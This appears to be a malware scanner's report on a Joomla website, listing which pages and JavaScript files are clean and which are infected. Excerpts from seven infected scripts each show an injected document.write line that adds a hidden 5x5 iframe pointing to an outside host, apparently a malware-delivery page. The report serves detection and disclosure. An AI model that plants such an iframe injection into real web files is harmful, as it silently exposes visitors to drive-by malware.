Scanned pages/files
Request | Server response | Status |
http://www.cw-design-work.de/ | 200 OK Content-Length: 153487 Content-Type: text/html | clean |
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 65055 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MooTools={version:"1.11"};function $defined(a){return(a!=undefined)}function $type(b){if(!$defined(b)){return false}if(b.htmlElement){return"element"}var a=typeof b;if(a=="object"&&b.nodeName){switch(b.nodeType){case 1:return"element";case 3:return(/\S/).test(b.nodeValue)?"textnode":"whitespace"}}if(a=="object"||a=="function"){switch(b.constructor){case Array:return"array";case RegExp:return"regexp";case Class:return"class"}if(typeof b.length=="number"){if(b.item){return"collection"} ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.cw-design-work.de/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://www.cw-design-work.de/plugins/content/denvideo/swfobject.js | 200 OK Content-Length: 6879 Content-Type: application/javascript | clean |
http://www.cw-design-work.de/plugins/content/yoo_gallery/lib/lightbox/slimbox_packed.js | 200 OK Content-Length: 4390 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Slimbox;(function(){var G={},H=0,F,M,B,T,U,P,c,E,N,K=new Image(),L=new Image(),Y,b,Q,I,X,a,J,Z,C;window.addEvent("domready",function(){c=W.bindWithEvent();$(document.body).adopt($$([Y=new Element("div",{id:"lbOverlay"}),b=new Element("div",{id:"lbCenter"}),a=new Element("div",{id:"lbBottomContainer"})]).setStyle("display","none"));Q=new Element("div",{id:"lbImage"}).injectInside(b).adopt(I=new Element("a",{id:"lbPrevLink",href:"#"}),X=new Element("a",{id:"lbNextLink",href:"#"}));I.onclick=D; return el.rel && el.rel.test(/^lightbox/i); }); $$(links).slimbox({}, null, function(el) { return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel)); }); }; window.addEvent("domready", Slimbox.scanPage);document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/base.js | 200 OK Content-Length: 1881 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 15={16:6(y,k){3 8=0;$$(y).n(6(4,i){3 7;9(4.K){7=4.K}O 9(4.h.J){7=4.h.J}8=A.8(8,7)});9(k!=14){8=A.8(8,k)}$$(y).n(6(4,i){3 I=4.m(\'E-z\').j()+4.m(\'E-F\').j()+4.m(\ ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 1507 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 x=7 E({F:4(j,n,3){0.J({r:\'p\',K:4(2){2.m(\'5\');2.g().m(\'5\')},H:4(2){2.l(\'5\');2.g().l(\'5\')}},3);0.8=j;0.b=n;A(0.3.r){B\'C\':0.q();D;p:0.s()}},s:4(){6 3={}; ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/fancymenu.js | 200 OK Content-Length: 2590 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('j Y=e U({1p:8(d,7){4.J({1u:1n.1l.1q,K:1f,1g:F,16:U.1i,f:1,g:\'D\',10:1e,V:\'6.1d\',T:\'6.Z\'},7);4.d=$(d),4.b=4.d.S(4.7.T);4.6=[];4.a=[];4.d.19(4.7.V).1c(8(5,i){4.N ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 2596 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 11=c 1m({1l:2(6,7){1.1k({A:\'1j\',K:\'W\',J:\'1n\',1o:1r,L:1q,s:\'e\',1p:l.1i.1s,1f:1a},7);5 8=1;1.d=$(6);1.w=1d;1.y=[];1.e=[];1.d.H({I:2(){8.e=[];8.x(10)},M:2(){ ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/template.js | 200 OK Content-Length: 3333 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var YOOTemplate = {
start: function() { YOOTemplate.setDivHeight(); new YOOAccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); var dropdown = new YOODropdownMenu('menu', { mode: 'slide', dropdownSelector: 'div.dropdown', transition: Fx.Transitions.Expo.easeOut }); dropdown.matchHeight(); var hoverColor; switch (YtSettings.color) { case 'combs YOOBase.matchHeight('div.mainbottombox div.deepest', 20); YOOBase.matchHeight('div.contenttopbox div.deepest', 20); YOOBase.matchHeight('div.contentbottombox div.deepest', 20); } }; window.addEvent('domready', YOOTemplate.start); ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://www.cw-design-work.de/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 3872 Content-Type: application/javascript | clean |
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=56&Itemid=53 | 200 OK Content-Length: 255034 Content-Type: text/html | clean |
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=46&Itemid=54 | 200 OK Content-Length: 150147 Content-Type: text/html | clean |
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=47&Itemid=55 | 200 OK Content-Length: 213227 Content-Type: text/html | clean |
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=49&Itemid=56 | 200 OK Content-Length: 146728 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cw-design-work.de
Result:
GET / HTTP/1.1
Host: cw-design-work.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: cw-design-work.de
Referer: http://www.google.com/search?q=cw-design-work.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cw-design-work.de
Referer: http://www.google.com/search?q=cw-design-work.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cw-design-work.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cw-design-work.de/
Result: cw-design-work.de is not infected or malware details are not published yet.
Result: cw-design-work.de is not infected or malware details are not published yet.